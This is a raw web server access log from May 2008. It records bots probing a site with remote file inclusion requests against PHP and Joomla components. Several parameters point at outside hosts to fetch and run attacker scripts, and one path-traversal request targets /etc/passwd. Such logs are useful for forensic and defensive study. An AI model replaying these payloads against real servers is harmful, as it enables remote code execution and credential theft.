209.216.213.115 - - [16/May/2008:10:50:02 -0700] "GET /logs/access_080212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:50:02 -0700] "GET /logs/access_071222.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:10:50:07 -0700] "GET //index.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:51:03 -0700] "GET /logs/access_080312.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:51:24 -0700] "GET /logs/access_080308.log/mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:51:24 -0700] "GET /logs/access_080313.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:51:24 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:51:25 -0700] "GET /logs/mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:51:31 -0700] "GET /logs/access_080309.log/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:51:31 -0700] "GET /logs/access_080309.log/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:51:47 -0700] "GET /logs/access_080215.log/mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:51:47 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:51:48 -0700] "GET /logs/mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:52:00 -0700] "GET /logs/access_080214.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.190.223.174 - - [16/May/2008:10:52:22 -0700] "GET /logs/access_071214.log/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.190.223.174 - - [16/May/2008:10:52:22 -0700] "GET /logs/access_071214.log/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.190.223.174 - - [16/May/2008:10:52:28 -0700] "GET /logs/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.190.223.174 - - [16/May/2008:10:52:28 -0700] "GET /logs/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.190.223.174 - - [16/May/2008:10:52:34 -0700] "GET /index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 200 11607 "-" "libwww-perl/5.808" "www.dmulk.com"
194.190.223.174 - - [16/May/2008:10:52:36 -0700] "GET /index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 200 11607 "-" "libwww-perl/5.808" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:10:52:36 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:10:53:37 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:53:41 -0700] "GET /logs/access_080215.log/mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:53:41 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:53:41 -0700] "GET /logs/mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:54:13 -0700] "GET /logs/access_080201.log/mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:54:19 -0700] "GET /logs/access_080201.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:54:19 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:54:19 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:54:19 -0700] "GET /logs/access_080220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:10:54:20 -0700] "GET /logs/access_080219.log/mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:54:41 -0700] "GET /logs/access_080102.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.2.204.171 - - [16/May/2008:10:55:12 -0700] "GET /index.php?place=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:55:39 -0700] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:10:55:49 -0700] "GET /index.php?side=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.104.19 - - [16/May/2008:10:55:49 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:10:55:58 -0700] "GET /index.php?side=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.104.19 - - [16/May/2008:10:56:00 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 200 11590 "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:56:01 -0700] "GET /logs/access_071229.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:10:56:04 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:10:56:04 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.115.80.2 - - [16/May/2008:10:56:24 -0700] "GET //photoalb/lib/static/header.php?set_menu=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.115.80.2 - - [16/May/2008:10:56:24 -0700] "GET /logs//photoalb/lib/static/header.php?set_menu=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.6.11.215 - - [16/May/2008:10:56:37 -0700] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:56:39 -0700] "GET /logs/access_080108.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:56:45 -0700] "GET /logs/access_071224.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:56:45 -0700] "GET /logs/access_080103.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:10:56:56 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:57:11 -0700] "GET /logs/access_080117.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:57:16 -0700] "GET /logs/access_080218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:10:57:21 -0700] "GET /retreat1/webcam/retreat1_00867.jpg HTTP/1.1" 200 45850 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:57:25 -0700] "GET /logs/access_071221.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:57:35 -0700] "GET /logs/access_071228.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:57:43 -0700] "GET /logs/access_071129.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:57:52 -0700] "GET /logs/access_071215.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.58.186 - - [16/May/2008:10:58:02 -0700] "GET /logs/access.log HTTP/1.0" 200 285418 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:58:10 -0700] "GET /logs/access_080110.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:58:15 -0700] "GET /logs/access_071218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:58:15 -0700] "GET /logs/access_080130.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:58:27 -0700] "GET /logs/access_071211.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:58:28 -0700] "GET /logs/access_080127.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:58:30 -0700] "GET /logs/access_080209.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:58:55 -0700] "GET /logs/access_080124.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:59:00 -0700] "GET /logs/access_080123.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:59:02 -0700] "GET /logs/access_080105.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:59:08 -0700] "GET /logs/access_071226.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.2.204.171 - - [16/May/2008:10:59:08 -0700] "GET /logs/access_080328.log/index.php?place=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:59:10 -0700] "GET /logs/access_080218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.2.204.171 - - [16/May/2008:10:59:14 -0700] "GET /logs/index.php?place=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.2.204.171 - - [16/May/2008:10:59:15 -0700] "GET /index.php?place=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:59:17 -0700] "GET /logs/access_080119.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:10:59:17 -0700] "GET /logs/access_080106.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.58.163 - - [16/May/2008:10:59:33 -0700] "GET / HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:59:56 -0700] "GET /logs/mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:59:56 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.103.23.40 - - [16/May/2008:11:00:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.terravitagolfclub.com/weather/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
83.103.23.40 - - [16/May/2008:11:00:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.terravitagolfclub.com/weather/test.txt?? HTTP/1.1" 200 4139 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
219.94.129.31 - - [16/May/2008:11:00:16 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.2.204.171 - - [16/May/2008:11:00:18 -0700] "GET /logs/access_080418.log/index.php?place=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:11:00:39 -0700] "GET /logs/access_080209.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:11:00:39 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:11:00:40 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:11:01:15 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:11:01:16 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:11:01:22 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:11:01:24 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:11:01:39 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:11:01:40 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:11:01:50 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:11:01:55 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.23.179.9 - - [16/May/2008:11:02:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.23.179.9 - - [16/May/2008:11:02:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=/../../../../../../../../etc/passwd HTTP/1.1" 200 4139 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:11:03:15 -0700] "GET /logs/access_080327.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:03:54 -0700] "GET /logs//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.84.31 - - [16/May/2008:11:04:00 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:04:06 -0700] "GET //?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:11:04:11 -0700] "GET /logs/access_080327.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:11:05:13 -0700] "GET /logs/access_080218.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:11:05:55 -0700] "GET /logs/access_080322.log/mcf.php?content=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.253.104.19 - - [16/May/2008:11:06:14 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.253.104.19 - - [16/May/2008:11:06:14 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:11:06:15 -0700] "GET /logs/access_080308.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:11:06:17 -0700] "GET /logs/access_080308.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.84.31 - - [16/May/2008:11:06:29 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.230.78.179 - - [16/May/2008:11:06:32 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [16/May/2008:11:06:32 -0700] "GET /logs//?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 200 47704 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [16/May/2008:11:06:39 -0700] "GET //?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:11:06:53 -0700] "GET /logs/access_080327.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.78.179 - - [16/May/2008:11:06:56 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:11:07:13 -0700] "GET /logs/mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:11:07:13 -0700] "GET /mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [16/May/2008:11:07:24 -0700] "GET /logs/access_080303.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.245.149.155 - - [16/May/2008:11:07:56 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [16/May/2008:11:07:57 -0700] "GET //config/dbutil.bck.php?confdir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [16/May/2008:11:07:58 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
